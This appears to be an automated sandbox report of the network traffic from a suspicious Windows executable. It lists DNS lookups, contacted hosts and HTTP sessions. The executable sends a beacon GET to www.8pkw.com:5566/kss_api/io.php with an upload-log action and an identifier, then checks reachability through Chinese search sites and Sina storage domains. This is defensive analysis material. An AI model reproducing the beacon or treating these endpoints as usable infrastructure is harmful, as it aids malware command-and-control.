Dec 5, 2024 14:27:29.105643988 CET | 53 | 55437 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 5, 2024 14:25:08.844228029 CET | 192.168.2.5 | 1.1.1.1 | 0x61a0 | Standard query (0) | www.8pkw.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:11.000616074 CET | 192.168.2.5 | 1.1.1.1 | 0xa59d | Standard query (0) | www.sina.com.cn | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:11.000616074 CET | 192.168.2.5 | 1.1.1.1 | 0x3101 | Standard query (0) | www.sogou.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:11.002671957 CET | 192.168.2.5 | 1.1.1.1 | 0x5bb3 | Standard query (0) | www.so.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:11.003994942 CET | 192.168.2.5 | 1.1.1.1 | 0xd037 | Standard query (0) | www.baidu.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:11.005053043 CET | 192.168.2.5 | 1.1.1.1 | 0x923b | Standard query (0) | www.iqiyi.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:12.737009048 CET | 192.168.2.5 | 1.1.1.1 | 0xa419 | Standard query (0) | sinacloud.net | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:12.759824038 CET | 192.168.2.5 | 1.1.1.1 | 0x6f3 | Standard query (0) | shoufeifz.qijianfz.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:13.723079920 CET | 192.168.2.5 | 1.1.1.1 | 0xa419 | Standard query (0) | sinacloud.net | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:26.504998922 CET | 192.168.2.5 | 1.1.1.1 | 0xd753 | Standard query (0) | sinastorage.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:27.504304886 CET | 192.168.2.5 | 1.1.1.1 | 0xd753 | Standard query (0) | sinastorage.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:28.519720078 CET | 192.168.2.5 | 1.1.1.1 | 0xd753 | Standard query (0) | sinastorage.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:41.681833029 CET | 192.168.2.5 | 1.1.1.1 | 0xaad1 | Standard query (0) | sinastorage.cn | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:42.676470995 CET | 192.168.2.5 | 1.1.1.1 | 0xaad1 | Standard query (0) | sinastorage.cn | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:26:19.135962963 CET | 192.168.2.5 | 1.1.1.1 | 0xc60d | Standard query (0) | sinastorage.cn | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:26:26.975692987 CET | 192.168.2.5 | 1.1.1.1 | 0x38c5 | Standard query (0) | sinacloud.net | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:26:50.392587900 CET | 192.168.2.5 | 1.1.1.1 | 0x14f8 | Standard query (0) | sinastorage.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:26:56.062326908 CET | 192.168.2.5 | 1.1.1.1 | 0xdf1c | Standard query (0) | sinastorage.cn | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:27:27.951493979 CET | 192.168.2.5 | 1.1.1.1 | 0x63dd | Standard query (0) | sinacloud.net | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:27:28.957143068 CET | 192.168.2.5 | 1.1.1.1 | 0x63dd | Standard query (0) | sinacloud.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 5, 2024 14:25:09.713490963 CET | 1.1.1.1 | 192.168.2.5 | 0x61a0 | No error (0) | www.8pkw.com |  | 43.154.56.182 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:11.155478001 CET | 1.1.1.1 | 192.168.2.5 | 0xd037 | No error (0) | www.baidu.com | www.a.shifen.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 14:25:11.155478001 CET | 1.1.1.1 | 192.168.2.5 | 0xd037 | No error (0) | www.a.shifen.com | www.wshifen.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 14:25:11.155478001 CET | 1.1.1.1 | 192.168.2.5 | 0xd037 | No error (0) | www.wshifen.com |  | 103.235.46.96 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:11.155478001 CET | 1.1.1.1 | 192.168.2.5 | 0xd037 | No error (0) | www.wshifen.com |  | 103.235.47.188 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:11.257349014 CET | 1.1.1.1 | 192.168.2.5 | 0x923b | No error (0) | www.iqiyi.com | www.iqiyiweb.akadns.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 14:25:11.675436020 CET | 1.1.1.1 | 192.168.2.5 | 0x3101 | No error (0) | www.sogou.com |  | 43.153.236.147 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:11.881963968 CET | 1.1.1.1 | 192.168.2.5 | 0x5bb3 | No error (0) | www.so.com | so.seos-lb.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 14:25:11.881963968 CET | 1.1.1.1 | 192.168.2.5 | 0x5bb3 | No error (0) | so.seos-lb.com |  | 104.192.110.226 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:11.972735882 CET | 1.1.1.1 | 192.168.2.5 | 0xa59d | No error (0) | www.sina.com.cn | spool.grid.sinaedge.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 14:25:11.972735882 CET | 1.1.1.1 | 192.168.2.5 | 0xa59d | No error (0) | spool.grid.sinaedge.com | ww1.sinaimg.cn.w.alikunlun.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 14:25:11.972735882 CET | 1.1.1.1 | 192.168.2.5 | 0xa59d | No error (0) | ww1.sinaimg.cn.w.alikunlun.com |  | 163.181.92.233 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:11.972735882 CET | 1.1.1.1 | 192.168.2.5 | 0xa59d | No error (0) | ww1.sinaimg.cn.w.alikunlun.com |  | 163.181.92.232 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:11.972735882 CET | 1.1.1.1 | 192.168.2.5 | 0xa59d | No error (0) | ww1.sinaimg.cn.w.alikunlun.com |  | 163.181.92.230 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:11.972735882 CET | 1.1.1.1 | 192.168.2.5 | 0xa59d | No error (0) | ww1.sinaimg.cn.w.alikunlun.com |  | 163.181.92.231 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:11.972735882 CET | 1.1.1.1 | 192.168.2.5 | 0xa59d | No error (0) | ww1.sinaimg.cn.w.alikunlun.com |  | 163.181.92.228 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:11.972735882 CET | 1.1.1.1 | 192.168.2.5 | 0xa59d | No error (0) | ww1.sinaimg.cn.w.alikunlun.com |  | 163.181.92.229 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:11.972735882 CET | 1.1.1.1 | 192.168.2.5 | 0xa59d | No error (0) | ww1.sinaimg.cn.w.alikunlun.com |  | 163.181.92.235 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:11.972735882 CET | 1.1.1.1 | 192.168.2.5 | 0xa59d | No error (0) | ww1.sinaimg.cn.w.alikunlun.com |  | 163.181.92.234 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:13.648283005 CET | 1.1.1.1 | 192.168.2.5 | 0x6f3 | No error (0) | shoufeifz.qijianfz.com |  | 119.28.131.242 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:14.310357094 CET | 1.1.1.1 | 192.168.2.5 | 0xa419 | No error (0) | sinacloud.net |  | 27.221.16.149 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:14.310357094 CET | 1.1.1.1 | 192.168.2.5 | 0xa419 | No error (0) | sinacloud.net |  | 27.221.16.179 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:14.310375929 CET | 1.1.1.1 | 192.168.2.5 | 0xa419 | No error (0) | sinacloud.net |  | 27.221.16.149 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:14.310375929 CET | 1.1.1.1 | 192.168.2.5 | 0xa419 | No error (0) | sinacloud.net |  | 27.221.16.179 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:28.557156086 CET | 1.1.1.1 | 192.168.2.5 | 0xd753 | No error (0) | sinastorage.com |  | 123.126.45.208 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:28.557267904 CET | 1.1.1.1 | 192.168.2.5 | 0xd753 | No error (0) | sinastorage.com |  | 123.126.45.208 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:28.661678076 CET | 1.1.1.1 | 192.168.2.5 | 0xd753 | No error (0) | sinastorage.com |  | 123.126.45.208 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:43.004333019 CET | 1.1.1.1 | 192.168.2.5 | 0xaad1 | No error (0) | sinastorage.cn |  | 183.60.95.221 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:25:43.004358053 CET | 1.1.1.1 | 192.168.2.5 | 0xaad1 | No error (0) | sinastorage.cn |  | 183.60.95.221 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:26:19.276137114 CET | 1.1.1.1 | 192.168.2.5 | 0xc60d | No error (0) | sinastorage.cn |  | 183.60.95.221 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:26:27.114407063 CET | 1.1.1.1 | 192.168.2.5 | 0x38c5 | No error (0) | sinacloud.net |  | 27.221.16.149 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:26:27.114407063 CET | 1.1.1.1 | 192.168.2.5 | 0x38c5 | No error (0) | sinacloud.net |  | 27.221.16.179 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:26:50.800753117 CET | 1.1.1.1 | 192.168.2.5 | 0x14f8 | No error (0) | sinastorage.com |  | 123.126.45.208 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:26:56.464216948 CET | 1.1.1.1 | 192.168.2.5 | 0xdf1c | No error (0) | sinastorage.cn |  | 183.60.95.221 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:27:29.105617046 CET | 1.1.1.1 | 192.168.2.5 | 0x63dd | No error (0) | sinacloud.net |  | 27.221.16.149 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:27:29.105617046 CET | 1.1.1.1 | 192.168.2.5 | 0x63dd | No error (0) | sinacloud.net |  | 27.221.16.179 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:27:29.105643988 CET | 1.1.1.1 | 192.168.2.5 | 0x63dd | No error (0) | sinacloud.net |  | 27.221.16.149 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 14:27:29.105643988 CET | 1.1.1.1 | 192.168.2.5 | 0x63dd | No error (0) | sinacloud.net |  | 27.221.16.179 | A (IP address) | IN (0x0001) | false
• www.8pkw.com:5566
• www.baidu.com
• www.sogou.com
• www.so.com
• www.sina.com.cn
• shoufeifz.qijianfz.com
• sinacloud.net
• 182.254.116.116
• 114.114.114.114
• 119.29.29.29
• sinastorage.com
• sinastorage.cn
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49706 | 43.154.56.182 | 5566 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:25:10.058543921 CET | 289 | OUT | GET /kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&&lgid=0&f=&x=91317019281 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSiE 6.0; Windows NT 5.1;)
Accept-Language: en-ch
Accept-Encoding: gzip, deflate
Host: www.8pkw.com:5566
Connection: Keep-Alive
Dec 5, 2024 14:25:11.643975019 CET | 382 | IN | HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.2.17
X-Powered-By: ASP.NET
Date: Thu, 05 Dec 2024 13:25:11 GMT
Content-Length: 143
Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 de 36 cd 2c 6b b3 9d 47 3f f3 68 97 fe 3f 6f db d5 a3 bb 77 e9 37 f9 df ff 03 32 72 70 8a 1f 00 00 00
Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"6,kG?h?ow72rp


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49708 | 103.235.46.96 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:25:11.281021118 CET | 219 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Host: www.baidu.com
Range: bytes=0-
Connection: Keep-Alive
Dec 5, 2024 14:25:12.907692909 CET | 1236 | IN | HTTP/1.1 200 OK
Bdpagetype: 1
Bdqid: 0xad45e32b005f54a8
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html; charset=utf-8
Date: Thu, 05 Dec 2024 13:25:12 GMT
P3p: CP=" OTI DSP COR IVA OUR IND COM "
P3p: CP=" OTI DSP COR IVA OUR IND COM "
Server: BWS/1.1
Set-Cookie: BAIDUID=F19AD5976F67B0CB8FFE731804781311:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BIDUPSID=F19AD5976F67B0CB8FFE731804781311; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: PSTM=1733405112; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BAIDUID=F19AD5976F67B0CBE32EDBCE12E8263E:FG=1; max-age=31536000; expires=Fri, 05-Dec-25 13:25:12 GMT; domain=.baidu.com; path=/; version=1; comment=bd
Set-Cookie: BDSVRTM=36; path=/
Set-Cookie: BD_HOME=1; path=/
Traceid: 1733405112073296897012485635315783914664
X-Ua-Compatible: IE=Edge,chrome=1
X-Xss-Protection: 1;mode=block
Transfer-Encoding: chunked
Data Raw: 32 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 69 73 5c 4b 76 18 f8 9d bf a2 04 44 8b 64 17 6a df 0b cd 27 11 20 48 82 0b 08 12 dc f5 7a 10 b7 6e dd 5b 55 44 6d a8 5b 55 d8 cc 08 c9 9e b6 ec f1 68 0b 85 ed 18 4b e3 19 29 c2 13 33 11 33 2d 39 46 1e 6b 24 4b fa 31 ee f7 ba fb d3 fc 85 39 e7 e4 72 73 bb b5 80 a0 64 47 b8 d1 ef bd aa 5b 79 33 4f 9e 3c 79 f2 ec f9 a3 5f 79 f0 62 f7 f5 87 c3 bd 54 77 3a e8 7f f3 a3 5f c9 64 8e 5e df 7f fd e6 28 f5 e2 69 26 f3 cd 8f d8 d3 6e e0 b5 bf f9 d1 20 98 7a d0 6c 3a ce 04 a7 b3 de fc de c6 ee 68 38 0d 86
Data Ascii: 200is\KvDdj' Hzn[UDm[UhK)33-9Fk$K19rsdG[y3O<y_ybTw:_d^(i&n zl:h8
Dec 5, 2024 14:25:12.907819033 CET | 1236 | IN | Data Raw: d3 cc eb 8b 71 b0 91 f2 d9 b7 7b 1b d3 e0 7c 9a c3 17 b7 fd ae 37 89 82 e9 bd d9 34 cc d4 37 1c 3d bc cf bc b9 9f d9 1d 0d c6 de b4 d7 ea ab 9d ec ef dd 0b da 9d 60 cb ef 4e 46 83 e0 5e 41 bc 2d 47 f1 fa 67 de 45 b4 91 1a 7a f0 f3 c6 24 08 83 c9
Data Ascii: q{|747=`NF^A-GgEz$$f?&|!Oo"O{???//[?gw?~
Dec 5, 2024 14:25:12.907833099 CET | 1236 | IN | Data Raw: f5 19 84 4a 37 2a 9e 4a 38 8e 4e bb 6c 86 c0 f0 1c 8b 7d d6 ed 4d 83 0c 90 a2 1f 00 8f 38 9b 78 e3 6d 63 5b 7f 4e 04 29 05 f8 e6 db ab 00 e8 db e6 bb 87 3e 73 ac d6 00 ab 88 59 d8 7c a9 fc 36 f0 0b 38 71 bd 3e 20 a7 d7 19 36 07 c0 36 fa c1 82 fe
Data Ascii: J7*J8Nl}M8xmc[N)>sY|68q> 66q\q@Uv#$oAqgn9$pjA.$Tb,ALl73$q*+Lk ZGjOH#+ m%lO%`7 8%OdJa#AQY
Dec 5, 2024 14:25:12.907947063 CET | 1236 | IN | Data Raw: 26 34 87 45 0b b8 d2 1c 52 59 30 47 71 47 06 99 9a b7 16 53 2b e0 1a 66 ce de ea f6 d0 4c 78 41 af 09 23 08 9b 8a 32 91 62 b1 b8 1a 20 64 4a d1 66 bf da 7b 2d 26 92 da f6 af 15 46 56 6d 9b a6 f9 12 79 b7 4b be 14 2b d4 28 34 2a f7 4b db dc 3c 00
Data Ascii: &4ERY0GqGS+fLxA#2b dJf{-&FVmyK+(4*K<2py#$Bea\%-gucM]wuL~rfvJ|+W9'd0&a\>Pzuahy6Hzf )'0!Y5GPRkRNhD.?3VkM:-
Dec 5, 2024 14:25:12.908004045 CET | 896 | IN | Data Raw: 9d 42 36 5f df c2 7f dd 4d 84 10 06 3e e6 9e ef 84 a9 d2 c0 ac 8d e6 df e6 e6 7d 5d 39 51 65 50 5c 73 b6 72 35 14 26 ec 93 c0 dc 3a aa f8 a1 b8 1d 61 8e 0e 59 56 d0 63 91 6d 7f 3c e0 93 50 27 e7 c8 65 e7 c5 94 ce a6 6a 8a d9 b7 6f 0b 1d 15 19 58
Data Ascii: B6_M>}]9QeP\sr5&:aYVcm<P'ejoXsKqqM&[w!$q,R,m]F7?g'b.B%`_l|Cjl4ZVkv{jO^oCnna[ne[N:m[-oM[84xiw+v)
Dec 5, 2024 14:25:12.908018112 CET | 1236 | IN | Data Raw: 59 80 95 78 ee e2 93 98 a1 fc ae cd c3 44 fa 82 10 c3 02 c6 07 c1 10 44 2f 52 b1 60 63 72 22 b5 e5 25 2d f4 a4 5c a6 68 18 96 e1 c4 4d 99 a8 74 c8 3d 2d 2d a1 f1 d2 d7 1b 68 b8 d0 84 4e fc d1 92 4b 89 91 a9 ce 6f 65 eb c4 d9 7b 14 7e 13 67 9a b0
Data Ascii: YxDD/R`cr"%-\hMt=--hNKoe{~g[S'`B0>@.!Gp[gL[B$baw7z@e'N|~_0+\{.+FMH"m@$U)N@[0aP0({Kc@'JqB_np}W
Dec 5, 2024 14:25:12.908030987 CET | 1236 | IN | Data Raw: a3 d4 ec df fe 3e 98 f9 f1 a7 ed 68 e2 53 12 f6 ea 3a 1b be 46 f9 d7 d4 b5 df 0e 03 bf 55 87 f4 8a 6c 30 9a de be 7b c3 1d fe da 26 c4 89 f4 ce 41 1f c4 c9 79 d3 3b b7 83 41 2b 80 7c c0 76 06 cb c9 a1 4b f0 f6 dd ad 2f 99 40 e8 e5 41 89 29 d7 bd
Data Ascii: >hS:FUl0{&Ay;A+|vK/@A)XQrTr7zBR>(jv:UNfVvRZhLT;z0#}2dYa^vSk9\b`gcDSe&w^rin/hL@9ExxDBh9VL
Dec 5, 2024 14:25:12.908042908 CET | 1236 | IN | Data Raw: 61 14 62 2d 90 2f c1 7f cc 1e 00 e7 6a 30 18 6b e4 e6 1d 66 31 71 6e b2 a2 e2 49 bd 61 17 6a 26 4d 19 df 50 4a d1 d8 fc d5 99 82 b8 0d 69 02 c8 9b c1 b1 28 53 6b b8 ec 4a 2e 78 6e 2b c3 8f 2a 0b a7 df 14 56 05 e4 6d 18 1e 50 6c 12 06 05 2d e4 8a
Data Ascii: ab-/j0kf1qnIaj&MPJi(SkJ.xn+*VmPl-.vei+UTVJLG.f%jI""(e0. HXs`_pLIK3NT/z-ts'7[s,ZTptP+fH`UjZDB$xXu
Dec 5, 2024 14:25:12.908759117 CET | 1236 | IN | Data Raw: bb 2b 39 3d 86 59 b0 2a f1 fc f3 db 0e 0d 41 9b 2b df e9 71 ed 38 d6 43 72 c1 1e 39 14 9b a3 b1 89 31 15 d1 0e 30 44 56 89 25 21 dc a6 4b 32 f8 27 eb b1 42 43 02 6e 68 ca 56 16 ac 9b 5c 29 d4 b7 38 6e 32 21 8c 5b 16 2b 78 f0 6d c3 b4 53 aa 16 4f
Data Ascii: +9=Y*A+q8Cr910DV%!K2'BCnhV\)8n2![+xmSOg\Ef}e0Ad-|Rl2lh3mM^ak3x(/:/XqYEBk6_aC59'{,gNTHR/ow*-y~2e~+`v-
Dec 5, 2024 14:25:12.908771038 CET | 1236 | IN | Data Raw: 44 0f 19 91 71 59 92 a9 2b a2 61 c4 fb 68 e0 15 98 5a ef 70 75 b8 ab 8b 22 4b 5a f8 75 0c 20 f6 52 e0 80 87 03 2d e5 0d db a9 3b f1 1d 2b 85 12 66 43 de bd 52 80 4d 1a 66 e1 20 04 0f da 8b 47 1d 60 11 71 c0 3d 69 31 b6 4e ac 86 80 28 a5 8f 48 f4
Data Ascii: DqY+ahZpu"KZu R-;+fCRMf G`q=i1N(HeWxZ5C'1eAsZbfAR21Fc1Tu4 kQHf(q$8"D<Y]Ae5'URk-_yg]iEaHDb)nPx^h
Dec 5, 2024 14:25:13.027704000 CET | 1236 | IN | Data Raw: e4 60 ae 4f c1 95 0e cc 25 06 a2 e8 65 b5 e1 6b 94 c1 23 8e 40 5c 44 b8 fe 90 af 53 9d d2 65 b4 23 10 11 c4 5c 67 c4 6f 94 cc a0 a0 86 7f 8e 3d a7 20 54 08 ae 90 41 1e 36 2c 0f b4 3c 2d e3 a8 49 da af 16 78 b0 4f a8 b6 98 38 d5 31 84 d1 3e 7d 19
Data Ascii: `O%ek#@\DSe#\go= TA6,<-IxO81>}U@=,<,cj&rb'=5$+!4Z""\K,bF,K5pJ2VnUu,O$U(j*/@RKfZqW\01sM`d`,~


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49710 | 43.153.236.147 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:25:11.798522949 CET | 219 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Host: www.sogou.com
Range: bytes=0-
Connection: Keep-Alive
Dec 5, 2024 14:25:13.479584932 CET | 564 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Thu, 05 Dec 2024 13:25:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: ABTEST=0|1733405113|v17; expires=Sat, 04-Jan-25 13:25:13 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: https://www.sogou.com/
UUID: 0cd3071f-a7cf-43d6-bb09-a659bb751a7e
Data Raw: 38 61 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8a<html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49711 | 104.192.110.226 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:25:12.003326893 CET | 216 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Host: www.so.com
Range: bytes=0-
Connection: Keep-Alive
Dec 5, 2024 14:25:13.601111889 CET | 425 | IN | HTTP/1.1 302 Moved Temporarily
Server: openresty/1.15.8.3
Date: Thu, 05 Dec 2024 13:25:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://www.so.com/
Set-Cookie: QiHooGUID=; Max-Age=63072000; Domain=so.com; Path=/
Data Raw: 38 65 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8e<html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49712 | 163.181.92.233 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:25:12.109844923 CET | 221 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Host: www.sina.com.cn
Range: bytes=0-
Connection: Keep-Alive
Dec 5, 2024 14:25:13.362621069 CET | 580 | IN | HTTP/1.1 302 Found
Server: Tengine
Date: Thu, 05 Dec 2024 13:25:13 GMT
Content-Type: text/html
Content-Length: 242
Connection: keep-alive
Location: https://www.sina.com.cn/
X-DSL-CHECK: 5
X-Via-CDN: f=aliyun,s=ens-cache3.de5,c=8.46.123.228;
Via: ens-cache3.de5[,0]
Timing-Allow-Origin: *
EagleId: a3b55c9717334051131616033e
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 72 65 73 69 64 65 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 64 65 72 20 61 20 64 69 66 66 65 72 65 6e 74 20 55 52 49 2e 3c 2f 70 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>302 Found</h1><p>The requested resource resides temporarily under a different URI.</p><hr/>Powered by Tengine</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49713 | 103.235.47.188 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:25:13.042954922 CET | 219 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Host: www.baidu.com
Range: bytes=0-
Connection: Keep-Alive
Dec 5, 2024 14:25:14.601835966 CET | 1236 | IN | HTTP/1.1 200 OK
Bdpagetype: 1
Bdqid: 0xedcd5c8a00b751b5
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html; charset=utf-8
